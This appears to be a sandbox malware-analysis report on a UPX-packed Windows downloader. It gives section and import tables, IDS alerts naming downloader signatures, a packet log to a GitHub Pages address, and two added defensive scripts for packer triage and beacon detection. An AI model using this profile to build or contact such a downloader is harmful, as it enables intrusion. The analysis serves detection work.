IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5ca20 | 0x140 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x36000 | 0x27000 | 0x26c00 | 0888333fe4cd72bfbf9e088b129d7a25 | False | 0.9775138608870968 | data | 7.898224932558204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5d000 | 0x1000 | 0x800 | 02fc1f9ef7e167d34be2dadcdacb1256 | False | 0.404296875 | data | 3.8464319187138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x5d0a4 | 0x340 | data | English | United States | 0.43028846153846156
RT_MANIFEST | 0x5d3e8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727

DLL | Import
ADVAPI32.dll | ReportEventW
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
SHELL32.dll | ShellExecuteExW
WININET.dll | InternetOpenW

Language of compilation system | Country where language is spoken | Map
English | United States |
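The section and import tables above are the textbook static profile of a UPX-packed PE32+: an empty, writable and executable UPX0 section (raw size 0x0, virtual size 0x35000) that the stub unpacks into, a UPX1 section at 7.90 bits/byte that holds the compressed payload and the entry point, and a kernel32 import set of just LoadLibraryA, GetProcAddress, VirtualProtect and ExitProcess (plus one function per other DLL so the loader still maps it). The real imports only exist after unpacking. The following script is an added example, not Joe Sandbox code and not anything from the sample: it parses the PE headers with the standard library only and reproduces those indicators (UPX section names, empty RWX section, entry point inside UPX1, high section entropy) on a constructed PE32+ image whose section table copies the report's layout. The section bodies are synthetic (SHA-256 output standing in for packed code) and the 7.5 bits/byte threshold is an assumption for this example.

```python
import hashlib
import math
import struct

# Added example (not Joe Sandbox code): static packer triage from raw PE bytes.

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the scale the report uses."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Parse DOS/COFF/optional headers and the section table of a PE32 or PE32+ file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]           # 0x10b PE32, 0x20b PE32+
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": raw_size,
                         "chars": chars, "entropy": shannon_entropy(raw)})
    return {"pe64": magic == 0x20B, "machine": machine,
            "entry_rva": entry_rva, "sections": sections}


def triage(data: bytes, entropy_threshold: float = 7.5) -> list:
    """Return human-readable packer indicators for one PE file (threshold is an assumption)."""
    pe = parse_pe(data)
    findings = []
    names = [s["name"] for s in pe["sections"]]
    if any(n.startswith("UPX") for n in names):
        findings.append("packer: UPX section names " + ",".join(names))
    for s in pe["sections"]:
        end = s["va"] + max(s["vsize"], s["raw_size"])
        if s["va"] <= pe["entry_rva"] < end:
            findings.append("entrypoint 0x%x in %s" % (pe["entry_rva"], s["name"]))
        rwx = s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE
        if rwx and s["raw_size"] == 0 and s["vsize"] > 0:
            findings.append("%s: empty RWX section (unpack destination)" % s["name"])
        if s["raw_size"] and s["entropy"] > entropy_threshold:
            findings.append("%s: entropy %.2f > %.1f" % (s["name"], s["entropy"], entropy_threshold))
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32+ whose section table copies the report's layout; bodies are synthetic."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 0x66E3874C, 0, 0, 240, 0x22)
    opt = bytearray(240)                                          # PE32+ optional header, 16 data dirs
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 16, 0x5C7B0)                      # AddressOfEntryPoint (report value)
    struct.pack_into("<Q", opt, 24, 0x140000000)                  # ImageBase
    packed = b"".join(hashlib.sha256(b"upx1-%d" % i).digest() for i in range(128))  # 4 KiB, ~7.95 bits/byte
    rsrc = b"\0" * 0x200
    upx1_ptr, rsrc_ptr = 0x200, 0x200 + len(packed)
    secs = [(b"UPX0", 0x35000, 0x1000, 0, 0, 0xE0000080),
            (b"UPX1", 0x27000, 0x36000, len(packed), upx1_ptr, 0xE0000040),
            (b".rsrc", 0x1000, 0x5D000, len(rsrc), rsrc_ptr, 0xC0000040)]
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, vs, va, rs, rp, ch in secs)
    image = bytearray(rsrc_ptr + len(rsrc))
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table  # 448 bytes, fits before 0x200
    image[:len(headers)] = headers
    image[upx1_ptr:upx1_ptr + len(packed)] = packed
    image[rsrc_ptr:rsrc_ptr + len(rsrc)] = rsrc
    return bytes(image)


if __name__ == "__main__":
    for line in triage(build_sample_pe()):
        print(line)
```

Run against a real file by replacing build_sample_pe() with open(path, "rb").read(). The entropy check deliberately skips sections with no raw data, otherwise UPX0 would score 0.0 and mask the more telling fact that it is an empty RWX section.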
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-29T02:26:01.082281+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49710 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:01.175695+0200 | 2001046 | ET MALWARE UPX compressed file download possible malware | 3 | 185.199.110.153 | 443 | 192.168.2.6 | 49710 | TCP
2024-09-29T02:26:01.872232+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49711 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:01.965049+0200 | 2001046 | ET MALWARE UPX compressed file download possible malware | 3 | 185.199.110.153 | 443 | 192.168.2.6 | 49711 | TCP
2024-09-29T02:26:02.740638+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49712 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:02.839748+0200 | 2001046 | ET MALWARE UPX compressed file download possible malware | 3 | 185.199.110.153 | 443 | 192.168.2.6 | 49712 | TCP
2024-09-29T02:26:09.596623+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49714 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:10.202534+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49715 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:10.297385+0200 | 2001046 | ET MALWARE UPX compressed file download possible malware | 3 | 185.199.110.153 | 443 | 192.168.2.6 | 49715 | TCP
2024-09-29T02:26:11.082553+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49717 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:11.170934+0200 | 2001046 | ET MALWARE UPX compressed file download possible malware | 3 | 185.199.110.153 | 443 | 192.168.2.6 | 49717 | TCP
2024-09-29T02:26:17.685412+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49721 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:24.719024+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49724 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:31.217086+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49725 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:37.673371+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49726 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:44.000738+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49728 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:50.547457+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49729 | 185.199.110.153 | 443 | TCP
2024-09-29T02:26:56.517807+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49731 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:02.499688+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49733 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:08.462279+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49734 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:14.453356+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49735 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:20.468666+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49736 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:26.655782+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49737 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:32.889465+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49739 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:39.281130+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49740 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:45.756534+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49741 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:52.185949+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49742 | 185.199.110.153 | 443 | TCP
2024-09-29T02:27:58.464364+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49743 | 185.199.110.153 | 443 | TCP
2024-09-29T02:28:04.777993+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49744 | 185.199.110.153 | 443 | TCP
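Two things in the alert table are worth more than the individual signatures. First, every 2803305 hit comes from a fresh ephemeral source port, so the sample opens a new TCP connection for each request rather than reusing one; from 02:26:17 onwards those connections arrive about every 6 seconds with little jitter, which is a beacon pattern. Second, the 2001046 "UPX compressed file download" hits are on the server-to-client direction of the first connections only, i.e. the packed payload is fetched up front and the later connections carry something else. The destination 185.199.110.153 is one of the GitHub Pages anycast addresses, shared hosting, so the IP on its own is a weak indicator and the timing profile is the more durable one. The script below is an added example, not Joe Sandbox or Suricata code: it groups the alerts by (SID, source, destination), ignoring ports on purpose, and flags a flow as periodic when its inter-arrival gaps cluster tightly around their median. The rows are constructed from the table above in an ad-hoc "timestamp|sid|src:port|dst:port" layout (not a Suricata output format), and the minimum event count and jitter threshold are assumptions.

```python
import statistics
from datetime import datetime

# Added example (not Joe Sandbox or Suricata code): inter-arrival profiling of IDS alerts.
# Rows constructed from the report's Suricata table; layout is ad hoc, not a Suricata format.
ALERT_ROWS = """\
2024-09-29T02:26:01.082281+0200|2803305|192.168.2.6:49710|185.199.110.153:443
2024-09-29T02:26:01.175695+0200|2001046|185.199.110.153:443|192.168.2.6:49710
2024-09-29T02:26:01.872232+0200|2803305|192.168.2.6:49711|185.199.110.153:443
2024-09-29T02:26:01.965049+0200|2001046|185.199.110.153:443|192.168.2.6:49711
2024-09-29T02:26:02.740638+0200|2803305|192.168.2.6:49712|185.199.110.153:443
2024-09-29T02:26:02.839748+0200|2001046|185.199.110.153:443|192.168.2.6:49712
2024-09-29T02:26:09.596623+0200|2803305|192.168.2.6:49714|185.199.110.153:443
2024-09-29T02:26:10.202534+0200|2803305|192.168.2.6:49715|185.199.110.153:443
2024-09-29T02:26:10.297385+0200|2001046|185.199.110.153:443|192.168.2.6:49715
2024-09-29T02:26:11.082553+0200|2803305|192.168.2.6:49717|185.199.110.153:443
2024-09-29T02:26:11.170934+0200|2001046|185.199.110.153:443|192.168.2.6:49717
2024-09-29T02:26:17.685412+0200|2803305|192.168.2.6:49721|185.199.110.153:443
2024-09-29T02:26:24.719024+0200|2803305|192.168.2.6:49724|185.199.110.153:443
2024-09-29T02:26:31.217086+0200|2803305|192.168.2.6:49725|185.199.110.153:443
2024-09-29T02:26:37.673371+0200|2803305|192.168.2.6:49726|185.199.110.153:443
2024-09-29T02:26:44.000738+0200|2803305|192.168.2.6:49728|185.199.110.153:443
2024-09-29T02:26:50.547457+0200|2803305|192.168.2.6:49729|185.199.110.153:443
2024-09-29T02:26:56.517807+0200|2803305|192.168.2.6:49731|185.199.110.153:443
2024-09-29T02:27:02.499688+0200|2803305|192.168.2.6:49733|185.199.110.153:443
2024-09-29T02:27:08.462279+0200|2803305|192.168.2.6:49734|185.199.110.153:443
2024-09-29T02:27:14.453356+0200|2803305|192.168.2.6:49735|185.199.110.153:443
2024-09-29T02:27:20.468666+0200|2803305|192.168.2.6:49736|185.199.110.153:443
2024-09-29T02:27:26.655782+0200|2803305|192.168.2.6:49737|185.199.110.153:443
2024-09-29T02:27:32.889465+0200|2803305|192.168.2.6:49739|185.199.110.153:443
2024-09-29T02:27:39.281130+0200|2803305|192.168.2.6:49740|185.199.110.153:443
2024-09-29T02:27:45.756534+0200|2803305|192.168.2.6:49741|185.199.110.153:443
2024-09-29T02:27:52.185949+0200|2803305|192.168.2.6:49742|185.199.110.153:443
2024-09-29T02:27:58.464364+0200|2803305|192.168.2.6:49743|185.199.110.153:443
2024-09-29T02:28:04.777993+0200|2803305|192.168.2.6:49744|185.199.110.153:443
"""


def parse_rows(text: str) -> list:
    """Parse the ad-hoc rows into dicts with an aware datetime, SID and endpoints."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, src, dst = line.split("|")
        sip, sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                       "sid": int(sid), "src": sip, "sport": int(sport),
                       "dst": dip, "dport": int(dport)})
    return events


def find_beacons(events: list, min_events: int = 8, max_mad_ratio: float = 0.25) -> dict:
    """Group by (sid, src, dst), ignoring ports because each connection uses a new ephemeral
    port, then measure gap regularity with median absolute deviation / median (robust to the
    few fast start-up requests). Thresholds are assumptions for this example."""
    groups = {}
    for e in events:
        groups.setdefault((e["sid"], e["src"], e["dst"]), []).append(e["ts"])
    profile = {}
    for key, stamps in groups.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps) if gaps else 0.0
        mad = statistics.median([abs(g - median) for g in gaps]) if gaps else 0.0
        ratio = mad / median if median > 0 else float("inf")
        profile[key] = {"count": len(stamps), "median_gap": median, "mad_ratio": ratio,
                        "periodic": len(stamps) >= min_events and ratio <= max_mad_ratio}
    return profile


if __name__ == "__main__":
    for key, p in find_beacons(parse_rows(ALERT_ROWS)).items():
        print(key, "n=%d median=%.2fs mad/median=%.3f periodic=%s"
              % (p["count"], p["median_gap"], p["mad_ratio"], p["periodic"]))
```

On these rows the outbound 2803305 flow has 24 alerts with a median gap of about 6.3 s and a MAD/median ratio under 0.05, so it is flagged even though the first six requests are sub-second; the inbound 2001046 flow has only five alerts and is not. The same grouping works on Suricata's own eve.json once the timestamp, alert.signature_id, src_ip and dest_ip fields are mapped onto the event dict.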
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 29, 2024 02:26:00.399130106 CEST | 49710 | 443 | 192.168.2.6 | 185.199.110.153
Sep 29, 2024 02:26:00.399188042 CEST | 443 | 49710 | 185.199.110.153 | 192.168.2.6
Sep 29, 2024 02:26:00.399281979 CEST | 49710 | 443 | 192.168.2.6 | 185.199.110.153
Sep 29, 2024 02:26:00.409811974 CEST | 49710 | 443 | 192.168.2.6 | 185.199.110.153
Sep 29, 2024 02:26:00.409837008 CEST | 443 | 49710 | 185.199.110.153 | 192.168.2.6
Sep 29, 2024 02:26:00.866276979 CEST | 443 | 49710 | 185.199.110.153 | 192.168.2.6
Sep 29, 2024 02:26:00.866374016 CEST | 49710 | 443 | 192.168.2.6 | 185.199.110.153
Sep 29, 2024 02:26:00.927198887 CEST | 49710 | 443 | 192.168.2.6 | 185.199.110.153
Sep 29, 2024 02:26:00.927243948 CEST | 443 | 49710 | 185.199.110.153 | 192.168.2.6
Sep 29, 2024 02:26:00.927614927 CEST | 443 | 49710 | 185.199.110.153 | 192.168.2.6
Sep 29, 2024 02:26:00.927675009 CEST | 49710 | 443 | 192.168.2.6 | 185.199.110.153
Sep 29, 2024 02:26:00.929698944 CEST | 49710 | 443 | 192.168.2.6 | 185.199.110.153
                                                                                                    Sep 29, 2024 02:26:00.971412897 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082303047 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082370043 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082396984 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082411051 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082427025 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082437992 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082462072 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082492113 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082509041 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082551003 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.082559109 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.082603931 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.089378119 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089438915 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089459896 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.089481115 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089493990 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.089530945 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.089535952 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089576960 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.089673042 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.089716911 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.097243071 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.097328901 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168490887 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168562889 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168593884 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168626070 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168626070 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168656111 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168672085 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168699980 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168704987 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168746948 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168752909 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168797970 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168802977 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168844938 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.168849945 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.168895006 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.169555902 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.169610977 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.169612885 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.169624090 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.169661045 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.169666052 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.169709921 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.169715881 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.169764042 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.175471067 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175530910 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.175537109 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175584078 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.175589085 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175632954 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.175638914 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175679922 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.175712109 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175764084 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.175767899 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175802946 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175807953 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.175812960 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.175853968 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.176631927 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.176682949 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.176685095 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.176693916 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.176729918 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.176752090 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.226140976 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.226212978 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.226222038 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.226345062 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.254301071 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.254379034 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.254390001 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.254406929 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.254452944 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.254452944 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.254760981 CEST49710443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.254780054 CEST44349710185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.267433882 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.267473936 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.267543077 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.267735004 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.267749071 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.740362883 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.740436077 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.740927935 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.740943909 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.741101027 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.741105080 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872262001 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872385025 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.872431040 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872478008 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.872488976 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872528076 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.872529984 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872544050 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872565031 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.872594118 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.872600079 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872636080 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872637987 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.872648001 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.872675896 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.872697115 CEST49711443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:01.873224974 CEST44349711185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:01.873276949 CEST49711443192.168.2.6185.199.110.153
